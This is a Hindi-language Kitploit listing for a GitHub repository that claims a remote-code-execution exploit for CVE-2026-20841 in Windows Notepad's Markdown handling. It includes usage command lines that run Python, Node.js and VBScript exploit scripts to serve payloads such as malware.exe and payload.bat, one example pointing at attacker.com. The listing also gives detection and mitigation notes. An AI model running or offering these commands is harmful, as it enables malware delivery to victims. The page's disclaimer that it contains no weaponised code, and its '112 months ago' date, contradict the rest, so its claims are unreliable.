Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20841 — CVE-2026-20841 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-20841
Payload GenerationVulnerability AnalysisExploitationMalware AnalysisLearning & EducationBinary ExploitationLabs & Practice
GitHub0xblackash/cve-2026-20841

CVE-2026-20841

CVE-2026-20841

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20841 - Windows Notepad Remote Code Execution (RCE)

ChatGPT Image Jun 1, 2026, 11_00_33 PM

Windows Severity CVE Status

सुरक्षा अनुसंधान और तकनीकी विश्लेषण रिपॉजिटरी


⚠️ यह रिपॉजिटरी केवल शैक्षिक, रक्षात्मक और अनुसंधान उद्देश्यों के लिए है।


📖 अवलोकन

CVE-2026-20841 एक गंभीर दूरस्थ कोड निष्पादन (RCE) कमजोरी है जो माइक्रोसॉफ्ट विंडोज नोटपैड की Markdown प्रसंस्करण कार्यक्षमता को प्रभावित करती है।

एक हमलावर एक विशेष रूप से तैयार की गई फ़ाइल को विंडोज नोटपैड के एक कमजोर संस्करण द्वारा खोले जाने पर मनमाना कोड निष्पादन को ट्रिगर कर सकता है।

प्रभाव

  • दूरस्थ कोड निष्पादन (RCE)
  • मनमाना कोड निष्पादन
  • संभावित उपयोगकर्ता-स्तरीय समझौता
  • सुरक्षा सीमा बायपास
  • मैलवेयर वितरण वेक्टर

🎯 प्रभावित उत्पाद

उत्पादस्थिति
Windows 11 Notepadअसुरक्षित
Windows 10 Notepadअसुरक्षित
अद्यतन/पैच किए गए संस्करणसुरक्षित

🔥 कमजोरी की जानकारी


📖 उपयोग कैसे करें :

root@kitploit:~
python CVE-2026-20841.py 192.168.1.100 80 malware.exe

Node.js संस्करण

root@kitploit:~
node CVE-2026-20841.js <host> <port> <payload-filename>

उदाहरण:

root@kitploit:~
node CVE-2026-20841.js attacker.com 445 payload.bat

VBScript संस्करण (Windows Native)

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>

उदाहरण:

root@kitploit:~
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe

🛠 तकनीकी विवरण

यह कमजोरी विंडोज नोटपैड की Markdown सामग्री हैंडलिंग कार्यक्षमता में मौजूद है।

एक विशेष रूप से तैयार की गई फ़ाइल को खोलने से असुरक्षित मेमोरी संचालन ट्रिगर हो सकते हैं जो वर्तमान उपयोगकर्ता के संदर्भ में मनमाना कोड निष्पादन का कारण बन सकते हैं।

संभावित हमला प्रवाह

root@kitploit:~
Attacker
    │
    ▼
Crafted Markdown File
    │
    ▼
Victim Opens File
    │
    ▼
Vulnerable Markdown Parser
    │
    ▼
Memory Corruption
    │
    ▼
Code Execution


🧪 प्रयोगशाला वातावरण

root@kitploit:~
OS          : Windows 11
Application : Notepad
Architecture: x64
Debugger    : WinDbg
Analysis    : Static + Dynamic

🔍 पहचान

समझौता संकेतक (IOCs)

  • संदिग्ध Markdown फ़ाइलें
  • नोटपैड से अप्रत्याशित चाइल्ड प्रक्रियाएं
  • असामान्य नोटपैड क्रैश
  • मेमोरी भ्रष्टाचार घटनाएं
  • नोटपैड से संबंधित EDR अलर्ट

🛡 शमन

  • माइक्रोसॉफ्ट सुरक्षा अपडेट लागू करें।
  • अविश्वसनीय स्रोतों से फ़ाइलें खोलने को प्रतिबंधित करें।
  • EDR/XDR निगरानी सक्षम करें।
  • एप्लिकेशन नियंत्रण नीतियों का उपयोग करें।
  • नोटपैड से जुड़ी प्रक्रिया निर्माण घटनाओं की निगरानी करें।

📚 संदर्भ

  • माइक्रोसॉफ्ट सुरक्षा सलाहकार
  • MITRE CVE डेटाबेस
  • विंडोज सुरक्षा दस्तावेज़ीकरण
  • सुरक्षा अनुसंधान प्रकाशन

⚠ अस्वीकरण

इस रिपॉजिटरी में शस्त्रीकृत शोषण कोड नहीं है।

प्रदान की गई जानकारी केवल इसके लिए है:

  • सुरक्षा अनुसंधान
  • रक्षात्मक विश्लेषण
  • कमजोरी प्रबंधन
  • शैक्षिक उद्देश्य

उपयोगकर्ता सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए जिम्मेदार हैं।


⭐ यदि इस रिपॉजिटरी ने आपके अनुसंधान में मदद की है, तो इसे एक स्टार देने पर विचार करें।

साइबरसुरक्षा अनुसंधान • कमजोरी विश्लेषण • रक्षात्मक सुरक्षा

टूल डाउनलोड करें
फ़ील्डमान
CVECVE-2026-20841
प्रकारदूरस्थ कोड निष्पादन
हमला वेक्टरतैयार की गई फ़ाइल
उपयोगकर्ता इंटरैक्शनआवश्यक
आवश्यक विशेषाधिकारकोई नहीं
गंभीरतागंभीर
विक्रेताMicrosoft